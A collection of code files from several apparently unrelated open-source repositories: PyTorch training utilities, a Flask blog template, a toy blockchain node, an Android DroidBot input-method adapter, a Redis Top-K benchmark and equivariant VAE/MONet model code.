import yaml
import numpy as np
from addict import Dict
import albumentations as A
from sklearn.metrics import roc_auc_score, roc_curve
from collections import defaultdict
import torch
from torch.optim.optimizer import Optimizer
from typing import Iterator, List, Optional, Union
from torch.utils.data import DistributedSampler, Dataset, Sampler
from operator import itemgetter
class DatasetFromSampler(Dataset):
"""Dataset to create indexes from `Sampler`.
Args:
sampler: PyTorch sampler
"""
def __init__(self, sampler: Sampler):
"""Initialisation for DatasetFromSampler."""
self.sampler = sampler
self.sampler_list = None
def __getitem__(self, index: int):
"""Gets element of the dataset.
Args:
index: index of the element in the dataset
Returns:
Single element by index
"""
if self.sampler_list is None:
self.sampler_list = list(self.sampler)
return self.sampler_list[index]
def __len__(self) -> int:
"""
Returns:
int: length of the dataset
"""
return len(self.sampler)
class DistributedSamplerWrapper(DistributedSampler):
"""
Wrapper over `Sampler` for distributed training.
Allows you to use any sampler in distributed mode.
It is especially useful in conjunction with
`torch.nn.parallel.DistributedDataParallel`. In such case, each
process can pass a DistributedSamplerWrapper instance as a DataLoader
sampler, and load a subset of subsampled data of the original dataset
that is exclusive to it.
.. note::
Sampler is assumed to be of constant size.
"""
def __init__(
self,
sampler,
num_replicas: Optional[int] = None,
rank: Optional[int] = None,
shuffle: bool = True,
):
"""
Args:
sampler: Sampler used for subsampling
num_replicas (int, optional): Number of processes participating in
distributed training
rank (int, optional): Rank of the current process
within ``num_replicas``
shuffle (bool, optional): If true (default),
sampler will shuffle the indices
"""
super(DistributedSamplerWrapper, self).__init__(
DatasetFromSampler(sampler), num_replicas=num_replicas, rank=rank, shuffle=shuffle
)
self.sampler = sampler
def __iter__(self) -> Iterator[int]:
"""Iterate over sampler.
Returns:
python iterator
"""
self.dataset = DatasetFromSampler(self.sampler)
indexes_of_indexes = super().__iter__()
subsampler_indexes = self.dataset
return iter(itemgetter(*indexes_of_indexes)(subsampler_indexes))
class Accuracy_Logger(object):
"""Accuracy logger"""
def __init__(self, n_classes):
super(Accuracy_Logger, self).__init__()
self.n_classes = n_classes
self.labels = []
self.probs = []
self.initialize()
def initialize(self):
self.data = [{"count": 0, "correct": 0} for i in range(self.n_classes)]
def log(self, Y_hat, Y):
Y_hat = int(Y_hat)
Y = int(Y)
self.data[Y]["count"] += 1
self.data[Y]["correct"] += (Y_hat == Y)
def log_prob(self, labels, prob):
self.labels.append(labels)
self.probs.append(prob)
def log_batch(self, Y_hat, Y):
Y_hat = np.array(Y_hat).astype(int)
Y = np.array(Y).astype(int)
for label_class in np.unique(Y):
cls_mask = Y == label_class
self.data[label_class]["count"] += cls_mask.sum()
self.data[label_class]["correct"] += (Y_hat[cls_mask] == Y[cls_mask]).sum()
def get_summary(self, c):
count = self.data[c]["count"]
correct = self.data[c]["correct"]
if count == 0:
acc = None
else:
acc = float(correct) / count
return acc, correct, count
def get_summary_final(self, curve_name):
count = 0.0
correct = 0.0
for c in range(self.n_classes):
count += self.data[c]["count"]
correct += self.data[c]["correct"]
acc = float(correct) / count
self.labels = np.concatenate(self.labels)
self.probs = np.concatenate(self.probs)
if self.n_classes == 2:
auc = roc_auc_score(self.labels, self.probs)
else:
auc = roc_auc_score(self.labels, self.probs, multi_class='ovr')
np.save(f"./results/{curve_name}_probs.npy", self.probs)
np.save(f"./results/{curve_name}_labels.npy", self.labels)
return acc, auc
def read_yaml(fpath="./configs/sample.yaml"):
with open(fpath, mode="r") as file:
yml = yaml.load(file, Loader=yaml.Loader)
return Dict(yml)
``` |
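A usage sketch for the `DistributedSamplerWrapper` defined in the utilities above: it lets a custom sampler (here a `WeightedRandomSampler`) be reused under distributed training. `num_replicas`/`rank` would normally come from the process group; they are hard-coded only to keep the sketch self-contained, and the import path is an assumption based on the file layout.
```python
import torch
from torch.utils.data import DataLoader, TensorDataset, WeightedRandomSampler
from utils.utils import DistributedSamplerWrapper  # hypothetical import path

dataset = TensorDataset(torch.randn(100, 8), torch.randint(0, 2, (100,)))
sampler = WeightedRandomSampler(weights=torch.ones(100), num_samples=100)

dist_sampler = DistributedSamplerWrapper(sampler, num_replicas=2, rank=0, shuffle=True)
loader = DataLoader(dataset, batch_size=16, sampler=dist_sampler)
for x, y in loader:   # each rank iterates over its own half of the resampled indices
    pass
```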
{
"source": "JinXJinX/flask-template",
"score": 2
} |
#### File: app/views/foo.py
```python
from flask import render_template, request, redirect
from app import app
from app.dblogic import blog as blog_db
@app.route("/")
def index():
return "Hello World!"
@app.route("/blog_list")
def blog_list():
blogs = list(blog_db.get_all_blog())
print(blogs)
data = {
"blogs": blogs
}
return render_template("blog_list.html", **data)
@app.route("/blog_new")
def blog_new():
args = request.args
title = args.get("title")
content = args.get("content")
rst = blog_db.add_blog(title, content)
return redirect("/blog_list")
@app.route("/blog_delete/<id>")
def blog_delete(id):
raise NotImplementedError()
``` |
{
"source": "JinXJinX/toychain",
"score": 3
} |
#### File: toychain/src/server.py
```python
from urllib.parse import urlparse
from flask import Flask, jsonify, request
import toychain
from miner import Miner
import settings
app = Flask(__name__)
tc = None
miner = None
def init():
global tc
global miner
pvt_key = app.config.get('PVT_KEY')
tc = toychain.ToyChain(app.config['PORT'], pvt_key=pvt_key)
if not pvt_key:
filename = app.config['CONFIG_FILENAME']
with open(f'{filename}.py', 'a') as f:
f.write(f'PVT_KEY = \'\'\'{tc.get_pvt_key()}\'\'\'')
print(tc.get_address())
if app.config['MINING']:
miner = Miner(tc)
miner.start()
@app.route('/add_node', methods=['POST'])
def add_node():
"""
Receive new node, add it to register node list, and broadcast it
"""
ip = request.remote_addr
data = request.get_json() or {}
port = data.get('node', {}).get('port')
if not port:
return jsonify({'ok': False}), 200
node = f'{ip}:{port}'
rst = tc.add_node(node)
return jsonify({'ok': rst}), 200
@app.route('/add_tx', methods=['POST'])
def add_tx():
"""
Receive new tx, verify it then broadcast it
"""
data = request.get_json() or {}
tx = data.get('tx')
rst = tc.add_tx(tx)
return jsonify({'ok': rst}), 200
@app.route('/add_block', methods=['POST'])
def add_block():
"""
Receive new block, verify it then add it to chain and broadcast it
"""
ip = request.remote_addr
data = request.get_json() or {}
block = data.get('block')
port = data.get('port')
if not block or not port:
return jsonify({'ok': False}), 200
node = f'{ip}:{port}'
rst = tc.add_block(block, node)
# TODO if mining, stop the mining thread
return jsonify({'ok': rst}), 200
@app.route('/get_block/<int:height>', methods=['GET'])
def get_block(height):
"""
Get block by height/idx
"""
chain = tc.get_chain()
if height >= len(chain):
return jsonify({'ok': False}), 200
response = {
'ok': True,
'block': chain[height]
}
return jsonify(response), 200
@app.route('/get_last_block', methods=['GET'])
def get_last_block():
"""
Get the lastest block in the chain
"""
chain = tc.get_chain()
response = {
'ok': True,
'block': chain[-1],
'height': len(chain)-1,
}
return jsonify(response), 200
@app.route('/get_node', methods=['GET'])
def get_node():
"""
Get a list of registered nodes
"""
response = {
'ok': True,
'nodes': tc.get_nodes()
}
return jsonify(response), 200
@app.route('/get_ledger', methods=['GET'])
def get_ledger():
"""
Get a list of ledger
"""
response = {
'ok': True,
'ledger': tc.get_ledger()
}
return jsonify(response), 200
@app.route('/ping', methods=['GET'])
def ping():
"""
ping
"""
return jsonify({'ok': True}), 200
```
#### File: toychain/src/toychain.py
```python
import time
from Crypto.PublicKey import RSA
import requests
import settings
import utils
import verifier as vf
class ToyChain:
def __init__(self, port, pvt_key=None,
version=settings.VERSION, node=True):
# TODO use private variables
self.tx_pool = []
self.version = version
self.port = port
self.nodes = utils.get_nodes(port)
self.ledger = {}
self.pvt_key = utils.new_rsa_key(pvt_key)
self.pub_key = self.pvt_key.publickey().exportKey().decode()
self.address = utils.pub_2_address(self.pub_key)
if node:
self.init_chain()
def new_block(self):
"""
Mining a new block.
"""
chain = self.chain
header = {
'version': self.version,
'ts': time.time(),
'prev_hash': '' if not chain else chain[-1]['hash'],
'nonce': '0',
'target': self.get_target(),
# TODO merkle root
}
        # TODO does the coinbase tx affect the merkle root?
coinbase_tx = self.new_tx('0', self.address, 50, 0)
tx_pool = self.tx_pool
        # use pop to keep draining the pool thread-safe
txs = [coinbase_tx] + [tx_pool.pop(0) for _ in range(len(tx_pool))]
block = dict(header)
# guess a nonce, this gonna takes ttttttttime
nonce = utils.get_nonce(header)
block['nonce'] = nonce
block['hash'] = utils.get_hash(block)
block['tx'] = txs
block['confirmation'] = 1
chain.append(block)
self.broadcast('block', block)
# update coinbase reward on ledger after fount the block
if not self.update_ledger([coinbase_tx]):
print('update ledger error???')
# TODO del this block
def send_coin(self, to_address, amount, fee):
"""
:param to_address: str, receiver address
:param amount: int,
:param fee: int, fee paid to miner
"""
tx = self.new_tx(self.address, to_address, amount, fee)
tx['hash'] = utils.get_hash(tx)
tx['signature'] = str(self.pvt_key.sign(tx['hash'].encode(), '')[0])
tx['pub_key'] = self.pub_key
tx['confirmation'] = 1
# boradcast tx
self.broadcast('tx', tx)
return True
def new_tx(self, from_address, to_address, amount, fee):
"""
generate new tx
:param from_address: str, sender address
:param to_address: str, recevier address
:param amount: int,
:param fee: int, fee paid to miner
:return: dict
"""
tx = {
'from': from_address,
'to': to_address,
'total_input': amount + fee,
'total_output': amount,
'ts': time.time(),
}
return tx
def get_target(self):
"""
get target hash for mining.
:return: str
"""
# TODO adjust target based on previous blocks' mining time
return settings.TARGET
def update_ledger(self, txs, ledger=None):
"""
update ledger, from a list of txs
:param txs: list,
:param ledger: dict,
:return: bool
"""
ledger = ledger or self.ledger
for tx in txs:
if tx['from'] != '0':
if ledger.get(tx['from'], 0) < tx['total_input']:
return False
ledger[tx['from']] = ledger.get(tx['from']) - tx['total_input']
ledger[tx['to']] = ledger.get(tx['to'], 0) + tx['total_output']
return True
def get_chain_from_node(self, node, entire_chain=True):
"""
get entire chain from a node
:param node: str,
:param ledger: dict,
"""
chain = []
ledger = {}
block_headers = None
if not entire_chain:
block_headers = {block['hash']: idx for idx, block in enumerate(self.chain)}
ret, data = utils._get(url=f'http://{node}/get_last_block')
if not (ret and data['ok']):
return [], {}
height = data.get('height', -1)
print(height)
while height > -1:
ret, data = utils._get(url=f'http://{node}/get_block/{height}')
print(ret)
if ret and data['ok']:
block = data.get('block', {})
print(f'verify chain: {vf.block(block)}')
if not vf.block(block):
break
if chain and chain[0]['prev_hash'] != block['hash']:
break
print(f'entire chain: {entire_chain}')
if not entire_chain and block['hash'] in block_headers.keys():
idx = block_headers.get(block['hash'])
chain = self.chain[:idx+1] + chain
break
chain.insert(0, block)
height -= 1
else:
return [], {}
# update ledger
txs = []
for block in chain:
txs.extend(block['tx'])
if not self.update_ledger(txs, ledger):
return [], {}
return chain, ledger
def init_chain(self):
for node in self.nodes:
chain, ledger = self.get_chain_from_node(node)
if chain:
self.chain = chain
self.ledger = ledger
return
# Create the genesis block
print('mining first block')
self.chain = []
self.ledger = {}
self.new_block()
def broadcast(self, type, data):
"""
Broadcast data to nodes
:param nodes: list of nodes
:param type: str, 'tx', 'block', or 'node'
:param data: a dict, depends on type,
"""
data = {type: data, 'port': self.port}
for node in list(self.nodes):
url = f'http://{node}/add_{type}'
            ret, _ = utils._post(url=url, json=data)  # don't overwrite the payload between nodes
if not ret:
self.nodes.remove(node)
def add_node(self, node):
"""
Add a node to node list
:param node: str, like 1.1.1.1:5000
:return: bool
"""
        if node in self.nodes:
return True
self.broadcast('node', node)
self.nodes.append(node)
return True
def add_block(self, new_block, node):
"""
Add a block to local chain
:param new_block: dict,
:return: bool
"""
if not vf.block(new_block):
return False
for block in list(self.chain):
if block['hash'] == new_block['hash']:
block['confirmation'] += 1
return True
if new_block['prev_hash'] == self.chain[-1]['hash']:
self.chain.append(new_block)
self.broadcast('block', new_block)
return True
return self.resolve_conflicts(node)
def resolve_conflicts(self, node):
url = f'http://{node}/get_last_block'
ret, data = utils._get(url=url)
if not ret or not data['ok']:
return False
if data['height'] > len(self.chain):
chain, ledger = self.get_chain_from_node(node, entire_chain=False)
if chain:
self.chain = chain
self.ledger = ledger
return True
return False
def add_tx(self, new_tx):
if not vf.tx(new_tx):
return False
if not self.update_ledger([new_tx]):
return False
for tx in list(self.tx_pool):
if tx['hash'] == new_tx['hash']:
tx['confirmation'] += 1
return
self.tx_pool.append(new_tx)
self.broadcast('tx', new_tx)
return True
def get_nodes(self):
return list(self.nodes)
def get_chain(self):
return list(self.chain)
def get_tx_pool(self):
return list(self.tx_pool)
def get_pvt_key(self):
return self.pvt_key.exportKey().decode()
def get_address(self):
return self.address
def get_ledger(self):
return dict(self.ledger)
```
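A small offline sketch of the class above: constructing it with `node=False` skips chain synchronisation and genesis mining and only derives an RSA key pair plus the corresponding address (assumes the `Crypto` dependency and the repo's `settings` module are available; unreachable default nodes are silently skipped).
```python
from toychain import ToyChain  # assumes src/ is on the import path

tc = ToyChain(port=5000, node=False)     # no chain sync, no genesis block mining
print(tc.get_address())                  # RIPEMD-160 digest of the SHA-256 of the public key
print(tc.get_pvt_key().splitlines()[0])  # '-----BEGIN RSA PRIVATE KEY-----'
```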
#### File: toychain/src/utils.py
```python
import time
import json
from Crypto.Random.random import randint
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256, RIPEMD
import requests
import settings
def new_rsa_key(pvt_key):
if pvt_key:
return RSA.importKey(pvt_key.encode())
# generate 2048bits long key
return RSA.generate(2048)
def get_hash(inp):
"""
Creates a SHA-256 hash of a input dictionary
:param inp: dict, such as block, tx
"""
b = json.dumps(inp, sort_keys=True).encode()
h = SHA256.new()
h.update(b)
return h.hexdigest()
def get_nonce(header):
target = header['target']
while True:
header = dict(header)
nonce = randint(0, settings.max_nonce)
header['nonce'] = nonce
hash = get_hash(header)
if hash < target:
return nonce
time.sleep(1) # 1 second
def get_nodes(port):
nodes = set()
data = {
'node': {
'port': port,
}
}
for node in settings.DEFAULT_NODES:
ret, info = _post(url=f'http://{node}/add_node', json=data)
if ret and info['ok']:
nodes.add(node)
return list(nodes)
def pub_2_address(pub_key):
"""
public key-(SHA256)-(RIPEMD160)->public key hash-(base58 encoding)->address
:param pub_key:
:return: str, address
"""
ripemd = RIPEMD.new()
sha = get_hash(pub_key)
ripemd.update(sha.encode())
pub_key_hash = ripemd.hexdigest()
# TODO base58 encoding
return pub_key_hash
def base58(inp):
pass
def _get(**kwargs):
try:
r = requests.get(**kwargs, timeout=5)
if r.status_code == 200:
return True, r.json()
except requests.exceptions.ConnectTimeout as e:
# print(e)
pass
except requests.exceptions.ConnectionError as e:
# print(e)
pass
except requests.exceptions.ReadTimeout as e:
# print(e)
pass
return False, None
def _post(**kwargs):
try:
r = requests.post(**kwargs, timeout=5)
if r.status_code == 200:
return True, r.json()
except requests.exceptions.ConnectTimeout as e:
# print(e)
pass
except requests.exceptions.ConnectionError as e:
# print(e)
pass
except requests.exceptions.ReadTimeout as e:
# print(e)
pass
except requests.exceptions.InvalidURL as e:
# print(e)
pass
return False, None
``` |
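The hashing helper above serialises with `json.dumps(..., sort_keys=True)`, so the digest does not depend on dictionary key order; a quick check (run from the repo's src/ directory so that `utils` and `settings` resolve):
```python
from utils import get_hash  # the helper defined above

a = {"to": "addr1", "from": "addr2", "total_output": 5}
b = {"from": "addr2", "total_output": 5, "to": "addr1"}

assert get_hash(a) == get_hash(b)  # key order does not change the digest
print(len(get_hash(a)))            # 64 hex characters (SHA-256)
```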
{
"source": "JinxKing/droidbot",
"score": 2
} |
#### File: droidbot/adapter/droidbot_ime.py
```python
import logging
import time
from .adapter import Adapter
DROIDBOT_APP_PACKAGE = "io.github.ylimit.droidbotapp"
IME_SERVICE = DROIDBOT_APP_PACKAGE + "/.DroidBotIME"
class DroidBotImeException(Exception):
"""
Exception in telnet connection
"""
pass
class DroidBotIme(Adapter):
"""
a connection with droidbot ime app.
"""
def __init__(self, device=None):
"""
initiate a emulator console via telnet
:param device: instance of Device
:return:
"""
self.logger = logging.getLogger(self.__class__.__name__)
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.connected = False
def set_up(self):
device = self.device
if DROIDBOT_APP_PACKAGE in device.adb.get_installed_apps():
self.logger.debug("DroidBot app was already installed.")
else:
# install droidbot app
try:
import pkg_resources
droidbot_app_path = pkg_resources.resource_filename("droidbot", "resources/droidbotApp.apk")
install_cmd = "install %s" % droidbot_app_path
self.device.adb.run_cmd(install_cmd)
self.logger.debug("DroidBot app installed.")
except Exception as e:
self.logger.warning(e)
self.logger.warning("Failed to install DroidBotApp.")
def tear_down(self):
self.device.uninstall_app(DROIDBOT_APP_PACKAGE)
def connect(self):
r_enable = self.device.adb.shell("ime enable %s" % IME_SERVICE)
if r_enable.endswith("now enabled"):
r_set = self.device.adb.shell("ime set %s" % IME_SERVICE)
if r_set.endswith("selected"):
self.connected = True
return
self.logger.warning("Failed to connect DroidBotIME!")
def check_connectivity(self):
"""
check if droidbot app is connected
:return: True for connected
"""
return self.connected
def disconnect(self):
"""
disconnect telnet
"""
self.connected = False
r_disable = self.device.adb.shell("ime disable %s" % IME_SERVICE)
if r_disable.endswith("now disabled"):
self.connected = False
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
return
self.logger.warning("Failed to disconnect DroidBotIME!")
def input_text(self, text, mode=0):
"""
Input text to target device
:param text: text to input, can be unicode format
:param mode: 0 - set text; 1 - append text.
"""
input_cmd = "am broadcast -a DROIDBOT_INPUT_TEXT --es text \"%s\" --ei mode %d" % (text, mode)
self.device.adb.shell(str(input_cmd))
if __name__ == "__main__":
droidbot_ime_conn = DroidBotIme()
droidbot_ime_conn.set_up()
droidbot_ime_conn.connect()
droidbot_ime_conn.input_text("hello world!", 0)
droidbot_ime_conn.input_text("世界你好!", 1)
time.sleep(2)
droidbot_ime_conn.input_text("再见。Bye bye.", 0)
droidbot_ime_conn.disconnect()
droidbot_ime_conn.tear_down()
``` |
{
"source": "JinxLbj/testBloom",
"score": 3
} |
#### File: testBloom/tests/benchmark.py
```python
import requests
import redis
import time
def create_topk(ctx, k, width, depth):
ctx.execute_command('topk.reserve', 'bm_topk', k, k * width, depth, 0.5)
def detect(list_a, list_b):
return len(set(list_a).intersection(list_b)) / float(len(list_a))
redis = redis.Redis(host='localhost', port=6379, db=0)
redis_pipe = redis.pipeline()
redis.flushall()
start_time = time.time()
print "Downloading data"
url = 'http://www.gutenberg.org/files/2600/2600-0.txt'
page = requests.get(url)
print("--- %s seconds ---" % (time.time() - start_time))
start_time = time.time()
print "\nUsing sorted set with pipeline"
#for line in page:
for line in page.iter_lines():
    if line != '' and line != ' ':
for word in line.split():
redis_pipe.zincrby('bm_text', 1, word)
responses = redis_pipe.execute()
for response in responses:
pass
real_results = redis.zrevrange('bm_text', 0, 49)
print("--- %s seconds ---" % (time.time() - start_time))
print('Memory used %s'% redis.memory_usage('bm_text'))
print('This is an accurate list for comparison')
print(redis.zcount('bm_text', '-inf', '+inf'))
# test Top-K
print("K Width(*k) Depth Memory Accuracy Time")
k_list = [10, 50, 100, 1000]
for k in k_list:
real_results = redis.zrevrange('bm_text', 0, k - 1)
for width in [4, 8]:
for depth in [3, 7, 10]:
redis.execute_command('DEL', 'bm_topk')
create_topk(redis, k, width, depth)
start_time = time.time()
for line in page.iter_lines():
                if line != '' and line != ' ':
a = line.split()
redis_pipe.execute_command('topk.add', 'bm_topk', *a)
responses = redis_pipe.execute()
for response in responses:
pass
leaderboard = redis.execute_command('topk.list', 'bm_topk')
print(str(k) + " " + str(width) + " " + str(depth) + " " +
str(redis.memory_usage('bm_topk')) + " " +
str(detect(real_results, leaderboard) * 100) + " " +
str(time.time() - start_time))
``` |
{
"source": "jinxu06/gsubsampling",
"score": 2
} |
#### File: elm/model/eqv_monet.py
```python
from attrdict import AttrDict
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
from torch.distributions.normal import Normal
from torch.distributions.categorical import Categorical
from torch.distributions.kl import kl_divergence
import numpy as np
from genesis.modules.unet import UNet
import genesis.modules.seq_att as seq_att
from genesis.utils.misc import get_kl
from .base import AutoEncoderModule
from absl import logging
from genesis.utils.misc import average_ari
from .monet import MONet
from .eqv_vae import EquivariantVAE
class EquivariantComponentVAE(EquivariantVAE):
def __init__(self,
in_channels,
out_channels,
n_channels,
img_size,
dim_latent,
activation=F.relu,
readout_fn=None,
fiber_group='trivial',
n_rot=1,
avg_pool_size=1,
optim_lr=0.0001,
profiler=None):
super().__init__(in_channels=in_channels,
out_channels=out_channels+1,
n_channels=n_channels,
img_size=img_size,
dim_latent=dim_latent,
activation=activation,
readout_fn=readout_fn,
fiber_group=fiber_group,
n_rot=n_rot,
avg_pool_size=avg_pool_size,
optim_lr=optim_lr,
profiler=profiler)
def forward(self, x, log_mask):
K = 1
b_sz = x.size(0)
if isinstance(log_mask, list) or isinstance(log_mask, tuple):
K = len(log_mask)
# Repeat x along batch dimension
x = x.repeat(K, 1, 1, 1)
# Concat log_m_k along batch dimension
log_mask = torch.cat(log_mask, dim=0)
# -- Encode
mask = log_mask.exp()
x *= mask
x = torch.cat((x, mask), dim=1)
mu, log_sigma_sq, crs, z_eqv = self.encode(x)
sigma = torch.exp(log_sigma_sq / 2.)
z = self.reparameterize(mu, log_sigma_sq)
x_r = self.decode(z, crs)
# -- Track quantities of interest and return
x_r_k = torch.chunk(x_r, K, dim=0)
z_k = torch.chunk(z, K, dim=0)
mu_k = torch.chunk(mu, K, dim=0)
sigma_k = torch.chunk(sigma, K, dim=0)
stats = AttrDict(mu_k=mu_k, sigma_k=sigma_k, z_k=z_k)
return x_r_k, stats
class EquivariantMONet(MONet):
def __init__(self,
in_channels,
out_channels,
n_channels,
img_size,
dim_latent,
activation=torch.nn.ReLU(),
K_steps=5,
prior_mode='softmax',
montecarlo_kl=False,
pixel_bound=True,
kl_l_beta=0.5,
kl_m_beta=0.5,
pixel_std_fg=0.1,
pixel_std_bg=0.1,
optimizer='ADAM',
fiber_group='trivial',
n_rot=1,
avg_pool_size=3):
self.ldim = dim_latent
self.fiber_group = fiber_group
self.n_rot = n_rot
self.avg_pool_size = avg_pool_size
super().__init__(in_channels=in_channels,
out_channels=out_channels,
n_channels=n_channels,
img_size=img_size,
dim_latent=dim_latent,
activation=activation,
K_steps=K_steps,
prior_mode=prior_mode,
montecarlo_kl=montecarlo_kl,
pixel_bound=pixel_bound,
kl_l_beta=kl_l_beta,
kl_m_beta=kl_m_beta,
pixel_std_fg=pixel_std_fg,
pixel_std_bg=pixel_std_bg,
optimizer=optimizer)
def _create_networks(self):
core = UNet(int(np.log2(self.img_size)-1), 32)
self.att_process = seq_att.SimpleSBP(core)
# - Component VAE
self.comp_vae = EquivariantComponentVAE(self.in_channels+1,
self.out_channels,
self.n_channels,
self.img_size,
self.dim_latent,
activation=F.relu,
readout_fn=None,
fiber_group=self.fiber_group,
n_rot=self.n_rot,
avg_pool_size=self.avg_pool_size)
self.comp_vae.pixel_bound = False
```
#### File: elm/model/eqv_vae.py
```python
import os
import sys
from collections import OrderedDict
from absl import logging
import numpy as np
import torch
import torch.nn.functional as F
import torchvision
import torchvision.transforms.functional as TF
import torch.optim as optim
import pytorch_lightning as pl
from .base import VariationalAutoEncoderModule
from .eqv_ae import EquivariantAE
from elm.nn import EquivariantConvNN, EquivariantConvTransposeNN, MLP, EquivariantGConvNN, EquivariantGConvTransposeNN
from elm.utils import get_meshgrid, CyclicGArray, Rot2dOnCyclicGArray, FlipRot2dOnCyclicGArray, recursive_decomposition, product_of_representives
from elm.utils import visualize_2d_vector
class EquivariantVAE(VariationalAutoEncoderModule, EquivariantAE):
def __init__(self,
in_channels,
out_channels,
n_channels,
img_size,
dim_latent,
activation=F.relu,
readout_fn=None,
fiber_group='trivial',
n_rot=1,
avg_pool_size=1,
optim_lr=0.0001,
profiler=None):
super().__init__(in_channels=in_channels,
out_channels=out_channels,
n_channels=n_channels,
img_size=img_size,
dim_latent=dim_latent,
activation=activation,
readout_fn=readout_fn,
optim_lr=optim_lr,
profiler=profiler)
self.fiber_group = fiber_group
self.n_rot = n_rot
self.avg_pool_size = avg_pool_size
self._create_networks()
self.params = self.parameters()
logging.debug("--------- Equivariant VAE ---------")
logging.debug("-------- Trainable Variables ---------")
for name, p in self.named_parameters():
logging.debug("{}, {}".format(name, p.size()))
logging.debug("--------------------------------------")
def _create_networks(self):
final_fs = self.img_size // 2**4
nc = self.n_channels
if self.fiber_group == 'trivial':
self.quotient_orders = np.array([(2,), (2,), (2,), (2,), (final_fs,)])
self.encoder = EquivariantConvNN(in_channels=self.in_channels,
out_channels=[nc,nc,2*nc,2*nc,nc*final_fs//2],
kernel_size=[3,3,3,3,final_fs+1],
scale_factor=self.quotient_orders,
padding_mode='circular',
activation=self.activation,
out_activation=self.activation,
use_bias=True)
self.decoder = EquivariantConvTransposeNN(in_channels=2*nc,
out_channels=[2*nc,2*nc,nc,nc,nc,self.out_channels],
kernel_size=[final_fs+1,3,3,3,3,3],
scale_factor=np.concatenate([self.quotient_orders[::-1], np.ones((1,1), dtype=np.int32)]),
padding_mode='circular',
activation=self.activation,
out_activation=self.readout_fn,
use_bias=True,
avg_pool_size=self.avg_pool_size)
elif self.fiber_group == 'rot_2d':
self.quotient_orders = np.array([(2,1), (2,1), (2,1), (2,2), (final_fs,2)])
self.encoder = EquivariantGConvNN(in_channels=self.in_channels,
out_channels=[nc,nc,2*nc,2*nc,nc*final_fs//2],
kernel_size=[3,3,3,3,final_fs+1],
scale_factor=self.quotient_orders,
padding_mode='circular',
activation=self.activation,
out_activation=self.activation,
use_bias=True,
fiber_group=self.fiber_group,
n_rot=self.n_rot)
self.decoder = EquivariantGConvTransposeNN(in_channels=2*nc,
out_channels=[2*nc,2*nc,nc,nc,nc,self.out_channels],
kernel_size=[final_fs+1,3,3,3,3,3],
scale_factor=np.concatenate([self.quotient_orders[::-1], np.ones((1,2), dtype=np.int32)]),
padding_mode='circular',
activation=self.activation,
out_activation=self.readout_fn,
use_bias=True,
fiber_group=self.fiber_group,
n_rot=self.n_rot,
avg_pool_size=self.avg_pool_size)
elif self.fiber_group == 'flip_rot_2d':
self.quotient_orders = np.array([(2,1,1), (2,1,1), (2,1,1), (2,2,1), (final_fs,2,2)])
self.encoder = EquivariantGConvNN(in_channels=self.in_channels,
out_channels=[nc,nc,2*nc,2*nc,nc*final_fs//2],
kernel_size=[3,3,3,3,final_fs+1],
scale_factor=self.quotient_orders,
padding_mode='circular',
activation=self.activation,
out_activation=self.activation,
use_bias=True,
fiber_group=self.fiber_group,
n_rot=self.n_rot)
self.decoder = EquivariantGConvTransposeNN(in_channels=2*nc,
out_channels=[2*nc,2*nc,nc,nc,nc,self.out_channels],
kernel_size=[final_fs+1,3,3,3,3,3],
scale_factor=np.concatenate([self.quotient_orders[::-1], np.ones((1,3), dtype=np.int32)]),
padding_mode='circular',
activation=self.activation,
out_activation=self.readout_fn,
use_bias=True,
fiber_group=self.fiber_group,
n_rot=self.n_rot,
avg_pool_size=self.avg_pool_size)
else:
raise Exception("Unknown fiber group {}".format(self.fiber_group))
self.flatten = torch.nn.Flatten()
self.unflatten = torch.nn.Unflatten(dim=1, unflattened_size=(2*nc,1,1))
self.encoder_mlp = MLP(in_sizes=nc*final_fs//2, out_sizes=[2*self.dim_latent])
self.decoder_mlp = MLP(in_sizes=self.dim_latent, out_sizes=[2*nc], out_activation=self.activation)
def g_act_z(self, g, z_eqv, origin=(0, 0)):
b = z_eqv.elems.size()[0]
g = torch.Tensor([g]).repeat(b,1).type_as(z_eqv.elems)
T = CyclicGArray(elems=torch.Tensor([origin]).repeat(b,1).type_as(z_eqv.elems), N=self.img_size, D=2)
if not self.fiber_group == 'trivial':
z_eqv.garray_N = T.inv().mul(z_eqv.garray_N)
if self.fiber_group == 'trivial':
G = CyclicGArray(elems=g[:, :2], N=self.img_size, D=2)
elif self.fiber_group == 'rot_2d':
F = CyclicGArray(elems=g[:, 2:], N=self.n_rot)
B = CyclicGArray(elems=g[:, :2], N=self.img_size, D=2)
G = Rot2dOnCyclicGArray(B, F)
elif self.fiber_group == 'flip_rot_2d':
F = DihedralGArray(elems=g[:, 2:], N=self.n_rot)
B = CyclicGArray(elems=g[:, :2], N=self.img_size, D=2)
G = FlipRot2dOnCyclicGArray(B, F)
else:
raise Exception("Unknown fiber group {}".format(self.fiber_group))
z_eqv = G.mul(z_eqv)
if not self.fiber_group == 'trivial':
z_eqv.garray_N = T.mul(z_eqv.garray_N)
crs = recursive_decomposition(z_eqv, quotient_orders=self.quotient_orders, fiber_group=self.fiber_group)
return crs, z_eqv
def g_act_x(self, g, x, origin=(0, 0), n_rot=4):
if isinstance(g, np.ndarray):
g = g.tolist()
x = torch.roll(x, shifts=[32-origin[0],32-origin[1]], dims=[-2,-1])
if len(g) >= 4 and g[3] > 0:
x = TF.vflip(x)
x = torch.roll(x, shifts=-self.img_size+1, dims=-2)
if len(g) >= 3 and g[2] > 0:
angle = (360/n_rot) * g[2]
rad = angle / 180 * np.pi
d = 0.5*np.sqrt(2)
r1 = np.array([np.cos(np.pi/4) * d, np.sin(np.pi/4) * d])
r2 = np.array([np.cos(rad+np.pi/4) * d, np.sin(rad+np.pi/4) * d])
r = tuple((r2 - r1).round().astype(np.int32).tolist())
x = TF.rotate(x, angle)
x = torch.roll(x, shifts=r, dims=[-2,-1])
if len(g) >= 2 and np.abs(g[:2]).max() > 0:
x = torch.roll(x, shifts=[g[0], g[1]], dims=[-2,-1])
x = torch.roll(x, shifts=[origin[0]-32,origin[1]-32], dims=[-2,-1])
return x
def encode(self, x):
z_inv, crs, z_eqv = self.encoder(x)
z_inv = self.encoder_mlp(self.flatten(z_inv))
mu, log_sigma_sq = torch.chunk(z_inv, chunks=2, dim=-1)
return mu, log_sigma_sq, crs, z_eqv
def decode(self, z_inv, crs):
z_inv = self.unflatten(self.decoder_mlp(z_inv))
x_hat = self.decoder(z_inv, crs)
return x_hat
def reparameterize(self, mu, log_sigma_sq):
sigma = torch.exp(log_sigma_sq/2.)
